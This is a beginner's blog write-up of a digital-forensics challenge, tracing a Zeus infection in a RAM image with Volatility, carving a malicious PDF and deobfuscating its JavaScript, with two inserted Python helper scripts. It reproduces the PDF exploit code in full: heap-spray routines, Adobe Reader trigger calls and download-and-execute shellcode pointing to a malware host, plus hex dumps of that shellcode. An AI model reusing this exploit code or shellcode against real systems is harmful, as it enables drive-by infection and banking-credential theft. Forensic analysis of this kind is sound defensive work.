About two weeks ago I returned from the excellent Digital Forensics training in
This post describes my approach to that challenge, the tools I used and some very dumb mistakes you should not make after reading it. Nothing sensational, but it may be helpful to someone just starting out in the digital forensics and malware analysis field (like me).
All the tools used below are, to my knowledge, free for personal use and mostly open-source.
The deadline to submit results passed on April 26, so any further disclosure is completely legit (though don’t read any further if you want to crack this exercise yourself).
So I downloaded the exercise image and fired up the VirtualBox machine with CAINE – an excellent set of forensic tools wrapped in a Linux LiveCD (which comes in handy when analyzing malware – you know, for kids).
So the image is unzipped, loaded in CAINE’s main interface and… fsstat FAIL. OK, maybe I should set the offset, 63 maybe? Nope, still no luck. Maybe Autopsy? The image loaded and keyword search gave some results, but no partitions were discovered, so still no-go. Hmm, let’s review the challenge intro…
Yep, it is a RAM image, not an HDD image (and yes, now I know I should read the challenge description first, maybe two times in a row). I didn’t know any tools to analyze RAM images, but Mommy taught me how to google so… download Volatility.
Good thing is that CAINE already has Python included, so I just unzipped it and jumped straight into action:
Let’s check what processes are running
root@caine:python volatility procscan2 -f /path/to/image/hn_forensics >processes.txt
and where do they connect
root@caine:python volatility connscan2 -f /path/to/image/hn_forensics >connections.txt
And what do we see:
Local Address Remote Address Pid
------------------------- ------------------------- ------
192.168.0.176:1176 212.150.164.203:80 888
192.168.0.176:1189 192.168.0.1:9393 1244
192.168.0.176:2869 192.168.0.1:30379 1244
192.168.0.176:2869 192.168.0.1:30380 4
0.0.0.0:0 80.206.204.129:0 0
127.0.0.1:1168 127.0.0.1:1169 888
192.168.0.176:1172 66.249.91.104:80 888
127.0.0.1:1169 127.0.0.1:1168 888
192.168.0.176:1171 66.249.90.104:80 888
192.168.0.176:1178 212.150.164.203:80 1752
192.168.0.176:1184 193.104.22.71:80 880
192.168.0.176:1185 193.104.22.71:80 880
192.168.0.176 is, apparently, the victim’s address, 192.168.0.1 is the network gateway (at least, so I guess), and 66.249.90.104 is Google.
And everything else is VERY interesting:
2010/02/26_18:04 | search-network-plus.com/ | 212.150.164.203 | - | YES exploit kit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/admin/ | 212.150.164.203 | - | control panel of YES exploit kit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0 | 212.150.164.203 | - | pdf exploit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/load.php?a=a&e=1 | 212.150.164.203 | - | zeus v2 trojan | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | - | 193.104.22.71/~produkt/9j856f_4m9y8urb.php | - | zeus v2 drop zone | - | 34305 |
2010/02/26_18:04 | - | 193.104.22.71/~produkt/983745213424/34650798253 | - | zeus v2 config file | - | 34305 |
2010/01/02_07:15 | excellenthostingservice.com/dkir8445g.php | 193.104.22.71 | - | zeus v2 drop zone | Andrey Zubkov / xm@qx8.ru | 34305 |
2009/12/27_11:46 | excellenthostingservice.com/jugd63885.exe | 193.104.22.71 | - | zeus v2 trojan | Andrey Zubkov / xm@qx8.ru | 34305 |
2009/12/27_11:46 | excellenthostingservice.com/kdfjhguv45yt5.bin | 193.104.22.71 | - | zeus v2 config file | Andrey Zubkov / xm@qx8.ru | 34305 |
copyright © 2009 www.malwaredomainlist.com
Looks like someone got himself thunderbolted;)
OK, now which processes connect to these nasty places?
Not surprisingly, there are:
1752 888 Sat Feb 27 20:12:23 2010 0x02261ac8 0x04040300 AcroRd32.exe
888 1756 Sat Feb 27 20:11:53 2010 0x02268220 0x04040380 firefox.exe
(Acrobat Reader is a child of Firefox, which tells us, considering also the briefing, that the infection vector was likely a malicious PDF downloaded from the Intertubes) and last but not least
880 688 Fri Feb 26 03:34:07 2010 0x02466a70 0x040400e0 svchost.exe
Let’s dump ’em down!
root@caine:python volatility procdump -f /path/to/image/hn_forensics -p 1752
volatility: error: Unable to load image. Possible causes: invalid dtb, wrong image type, unsupported image type.
Uh-oh. Same with the other processes. So, what image type exactly don’t you like?
root@caine:python volatility ident -f /path/to/image/hn_forensics
IMAGE NAME: /path/to/image/hn_forensics
IMAGE TYPE: UNKNOWN
What do you mean, UNKNOWN?
[…Skipped 2 days of googling, examining the image with hex/binary editor, googling again, downloading and applying countless tools, more googling, finally stumbling upon the image in CAINE file explorer which indicated hn_forensics is actually a tar file]
Enter Bob.vmem
Finally, the executables are dumped and sent straight to VirusTotal. 0/40 (actually, svchost.exe got one hit from some obscure CAT AV, but let’s count it as a false positive). What next?
Maybe there is something interesting in the processes’ memory?
root@caine:python volatility memdmp -f /path/to/image/Bob.vmem -p pid
Now, just opening these dumps in a hex/binary editor gives some useful results: you can determine the machine and user name (which is Administrator, ah so unwise of you, Bob!), environment variables etc.
And a bit more (here are just some sample strings I found):
Acrord32 (1752)
GET /~produkt/983745213424/34650798253 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 193.104.22.71 (familiar address, heh?)
Pragma: no-cache
w-form-urlencoded
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft.com
Content-Length: 73
Connection: Keep-Alive
Cache-Control: no-cache
MIMETYPE=application/x-silverlight-2&CLSID=application_2F_x-silverlight-2
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php (looks totally benign to me!)
115f8a6b Host: 193.104.22.71
159f5529 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
POST /~produkt/9j856f_4m9y8urb.php HTTP/1.1.
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php
1a80cf51 A V I R A 2 1 0 8
1b11a53f http://193.104.22.71/~produkt/69825439870/73846525#
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php&
1b11a5c7 !*.microsoft.com/
http:/ m\Uffffffff\Uffffffffspac
?odnoklassniki. (Bob, someone misses you in
vko3kte@*/logi
COMPUTERNAME=BOB-DCADFEDC55C
urlmon.dll ObtainUserAgentString
https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
ACustomerServiceMenuEntryPoint?custAction=75
GRABBED TAN
pass
ASKIPPED TAN:
Cookies:
Path: atdmt.com/
MUID=94FE735020664E66A3C9C9D5F41F5B6F
Path: rad.msn.com/
Path: ad.wsod.com/
u_1=4b87435bc9aef
Path: google.com/
PREF=ID=05cbfa879c788048:U=6d9c1ca8f172cf34:TM=1267155808:LM=1267155821:S=HPq9qDiZCOp14r3Q
Path: kontera.com/
cluid=-8245845131267300210411
Path: questionmarket.com/
CS1=707381-23-1
Path: msn.com/
MC1=V=3&GUID=2896b15715de4227be7aa457546a3447
mh=MSFT
CC=US
CULTURE=EN-US
MUID=94FE735020664E66A3C9C9D5F41F5B6F
Path: www.msn.com/
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F
hpcli=W.H|L.|S.|R.|U.L|C.|H.
ushpwea=wc:USNY1232
wpv=2
Path: oldversion.com/
__utma=183186040.157986524.1267155813.1267155813.1267300204.2
__utmz=183186040.1267300204.2.2.utmccn=(organic)|utmcsr=google|utmctr=old+software|utmcmd=organi
https://banking.dee/cgi/ueberweisu
Registered email address*
onClick="javascript:handlePageLink('/internetBanking/RequestRouter?requestCmdId=AccountDetails
Account Name
account-history-wait.jsp" method="post">
id="dgDepositAcctsheader0"*>
You betcha there are some banking troubles!
OK, now we know what the tricks are, but who is playing them? It would be very helpful to take a look at that malicious PDF… Assuming it is in memory (and the briefing strongly hints at that), how can we find it?
Of course, you can dig up the PDF format specification and search for headers/footers in the dump manually, but isn’t that so 90’s?
One of CAINE’s most useful utilities is FOREMOST – a file carving tool that searches the image for all files of a given type (executables, web pages, multimedia etc.) by their headers/footers. It is originally intended for HDD images, but it doesn’t hurt to try it on a process RAM dump:
root@caine: foremost -t pdf -i /path/to/image/1752.dmp -o 1752
You can actually scan for several or even all types of files, but it takes loads of time and HDD space (there are many false positives like 70 MB gif images and so on), so let’s just stick to pdf for now.
In the output folder we have 7 pdf files, 5 of them slightly more than 400 bytes long (likely FP) and the other two ~60 and ~600 KB, the former encrypted. VirusTotal gives 0/40 for the first and 15/40 for the second. Looks like we have a hit.
Now, how can we determine what vulnerability was exploited and what the payload is? I could just transfer the pdf to a Windows machine and launch it, but somehow I felt uneasy about it ;). So googling directed me to Didier Stevens’ blog, which hosts tools to extract objects (including malware scripts) from PDF files and a screencast on how to use them.
Following the screencast instructions I extracted the (probably) malicious JavaScript, which looked like this:
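A stripped-down version of what foremost does with its pdf signature, as an added example (not the author’s code and not foremost’s own algorithm): scan a buffer for %PDF- headers and %%EOF footers, then do a quick pdfid-style triage of each candidate so the 400-byte false positives and the encrypted one stand out before anything goes to VirusTotal. The sample dump is constructed inline.

```python
# Simplified header/footer carving for PDFs in a raw memory dump, plus a cheap triage.
# This is an illustration, not foremost's actual algorithm (foremost also handles
# linearized PDFs and size hints); the sample dump below is constructed.
PDF_HEADER = b"%PDF-"
PDF_FOOTER = b"%%EOF"
# Keywords worth a second look in a carved candidate (same idea as Didier Stevens' pdfid)
INDICATORS = (b"/Encrypt", b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")


def carve_pdfs(buf: bytes, max_size: int = 2 * 1024 * 1024) -> list:
    """Return (offset, data) for every %PDF- ... %%EOF span in buf.

    A header with no footer within max_size bytes is cut at max_size, which is
    one reason carvers emit odd-sized files. Scanning resumes after each carve.
    """
    results = []
    pos = 0
    while True:
        start = buf.find(PDF_HEADER, pos)
        if start < 0:
            break
        end = buf.find(PDF_FOOTER, start + len(PDF_HEADER))
        if end < 0 or end - start > max_size:
            data = buf[start:start + max_size]
        else:
            data = buf[start:end + len(PDF_FOOTER)]
        results.append((start, data))
        pos = start + len(data)
    return results


def triage(data: bytes) -> dict:
    """Does the candidate contain any objects at all, and which risky keywords?"""
    has_objects = b"endobj" in data
    return {
        "size": len(data),
        "has_objects": has_objects,
        "keywords": [k.decode() for k in INDICATORS if k in data],
        # header/footer pair with nothing object-like between: almost surely a false positive
        "likely_fp": not has_objects,
    }


def build_sample() -> bytes:
    """Constructed 'process dump': junk bytes around a PDF carrying JavaScript,
    a stray header/footer pair, and an encrypted PDF."""
    pdf_js = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
              b"2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R >>\n%%EOF")
    stray = b"%PDF-1.1\n" + b"\x00" * 64 + b"%%EOF"
    pdf_enc = (b"%PDF-1.5\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
               b"trailer\n<< /Root 1 0 R /Encrypt 3 0 R >>\n%%EOF")
    junk = b"\x90" * 32
    return junk + pdf_js + junk + stray + junk + pdf_enc + junk


if __name__ == "__main__":
    for offset, data in carve_pdfs(build_sample()):
        print(hex(offset), triage(data))
```

Pointing carve_pdfs at a real procdump/memdmp output is the same loop over a much bigger buffer; the triage is what tells you which of the seven carved files deserve a closer look.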
var xtdxJYVm='0111…<22>…';function yRgjvasM(EajhtdGQ,replace,RzUbJqHU){if(!(replace instanceof Array)){replace=new Array(replace);if(EajhtdGQ instanceof Array){while(EajhtdGQ.length>replace.length){replace[replace.length]=replace[0];}}}if(!(EajhtdGQ instanceof Array))EajhtdGQ=new Array(EajhtdGQ);while(EajhtdGQ.length>replace.length){replace[replace.length]='';}if(RzUbJqHU instanceof Array){for(WsvDXhZg in RzUbJqHU){RzUbJqHU[WsvDXhZg]=yRgjvasM(EajhtdGQ,replace,RzUbJqHU[WsvDXhZg]);}return RzUbJqHU;}for(var WsvDXhZg=0;WsvDXhZg
After some testing in SpiderMonkey and adding a } at the end, I submitted it to Wepawet for analysis.
The deobfuscation result was marked as benign (yes, I believe… believe you are lying!) and looked just a bit less… well, obfuscated:
function OzWJi(rzRoI, fxLUb){
while (rzRoI.length * 2 <>
rzRoI += rzRoI;
}
return rzRoI.substring(0, fxLUb / 2);
}
function bSuTN(){
var Uueqk = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");
var HWXsi = 202116108;
var ZkzwV = [];
var HsVTm = 4194304;
var EgAxi = Uueqk.length * 2;
var fxLUb = HsVTm - (EgAxi + 0x38);
var rzRoI = sly("\u9090\u9090");
rzRoI = OzWJi(rzRoI, fxLUb);
var tfFQG = (HWXsi - 4194304) / HsVTm;
for (var gtqHE = 0; gtqHE <>
ZkzwV[gtqHE] = rzRoI + Uueqk;
}
var eHmqR = sly("\u0c0c\u0c0c");
while (eHmqR.length <>
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : eHmqR
}
);
}
function Soy(){
var dwl = new Array();
function ppu(BtM, dqO){
while (BtM.length * 2 <>
BtM += BtM;
}
BtM = BtM.substring(0, dqO / 2);
return BtM;
}
XrS = 0x30303030;
HRb = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");
var jxU = 4194304;
var RaR = HRb.length * 2;
var dqO = jxU - (RaR + 0x38);
var BtM = sly("\u9090\u9090");
BtM = ppu(BtM, dqO);
var JYD = (XrS - 4194304) / jxU;
for (var Prn = 0; Prn <>
dwl[Prn] = BtM + HRb;
}
var IdI = "66055447950636260127";
for (sly = 0; sly <>
IdI += "3";
}
util.printf("%45000f", IdI);
}
function ynu(shG){
shG = shG.replace(/[\+1]/g, "0");
shG = shG.replace(/[\+2]/g, "9");
shG = shG.replace(/[\+3]/g, "8");
shG = shG.replace(/[\+4]/g, "7");
shG = shG.replace(/[\+5]/g, "6");
shG = shG.replace(/[\+6]/g, "5");
shG = shG.replace(/[\+7]/g, "4");
shG = shG.replace(/[\+8]/g, "3");
shG = shG.replace(/[\+9]/g, "2");
shG = shG.replace(/[\+0]/g, "1");
return shG;
}
function XiIHG(){
var cqcNr = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");
dPl = sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090") + cqcNr;
FQI = sly("\u9090\u9090");
fhT = 5 * 2;
sLa = fhT + dPl.length;
while (FQI.length <>
NJn = FQI.substring(0, sLa);
eUq = FQI.substring(0, FQI.length - sLa);
while (eUq.length + sLa < euq =" eUq">
Cwy = [];
for (XWT = 0; XWT <>
var kKG = 4012;
var LwZ = Array(kKG);
for (XWT = 0; XWT <>
LwZ[XWT] = sly("\u000a\u000a\u000a\u000a");
}
Collab.getIcon(LwZ + "_N.bundle");
}
var sly = unescape, ZgA = app.viewerVersion.toString(), TjP = this ;
if (ZgA <>
bSuTN();
}
if (ZgA >= 8 && ZgA <>
Soy();
}
if (ZgA <= 9){
XiIHG();
}
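What Wepawet’s “Shellcode and Malware” section boils down to, as an added example in Python (not the author’s code and not Wepawet’s): sly is unescape, so each \uXXXX in those strings is a UTF-16 code unit that lands in memory as two little-endian bytes. Decoding the string that way and running a strings-style pass over the result gives the bytes and the payload URL without executing anything. Only the head and the URL-carrying tail of the bSuTN() string are copied here; the shellcode body is left out.

```python
import re

# Head and tail of the sly("...") argument from bSuTN() above. Python "\uXXXX" escapes
# yield the same UTF-16 code units as the JavaScript ones; the shellcode body is omitted.
PAYLOAD_HEAD = "\uC033\u8B64\u3040\u0C78\u408B\u8B0C"
PAYLOAD_TAIL = (
    "\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70"
    "\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D"
    "\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D"
    "\u0000%25%30%25%30%25%30%25%30%25%30%25%30"
)


def js_unescape(s: str) -> str:
    """Port of JavaScript's legacy unescape(): %uXXXX and %XX become one code unit
    each; everything else (including already-resolved \\u escapes) is untouched."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def units_to_bytes(s: str) -> bytes:
    """The memory layout the exploit relies on: every UTF-16 code unit is stored as
    two little-endian bytes, so "\\uC033" is 33 c0 (xor eax, eax)."""
    return s.encode("utf-16-le", errors="surrogatepass")


def decode_payload(js_string: str) -> bytes:
    """unescape() first, then lay the code units out as bytes."""
    return units_to_bytes(js_unescape(js_string))


def printable_strings(blob: bytes, min_len: int = 6) -> list:
    """strings(1)-style extraction of printable ASCII runs."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


URL_RE = re.compile(r"https?://[\x20-\x7e]+")  # runs up to the first NUL/non-printable


def find_urls(blob: bytes) -> list:
    """The payload URLs, i.e. what the report's 'Additional (potential) malware' lists."""
    return URL_RE.findall(blob.decode("latin-1"))


if __name__ == "__main__":
    print("first bytes:", units_to_bytes(PAYLOAD_HEAD).hex())
    for url in find_urls(decode_payload(PAYLOAD_TAIL)):
        print("payload URL:", url)
```

The first bytes come out as 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b, the same prologue Wepawet printed, and the tail yields the load.php URL with e=2; the other two sly strings differ only in that parameter.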
What next? Yes, submit it to Wepawet again :)
And…
Detection results
Detector | Result |
Jsand 1.02.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
ActiveX controls
No objects/controls.
Shellcode and Malware
Hexadecimal | ASCII |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 32 00 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 | 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=2..%.0.%. 0.%.0.%.0.%.0.%. 0. |
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 33 00 00 34 13 34 13 | ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=3..4.4. |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 31 00 00 00 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 | 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=1....#.&. #.&.#.&.#.&.#.&. #.&.#.&.#.&.#.&. #.&. |
Additional (potential) malware:
URL | Type | Hash | Analysis |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1 | N/A | N/A | |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2 | N/A | N/A | |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3 | N/A | N/A | |
DING-DING-DING! JACKPOT!!!
We got deobfuscated shellcode and payload URLs. That’s pretty much everything we need for now. Of course, you should also review what files and registry entries are created and investigate the service apparently created by the malware (remember that svchost.exe?), but that is pretty straightforward using Volatility and you can figure it out yourself.
Hope this was an amusing story or at least helpful.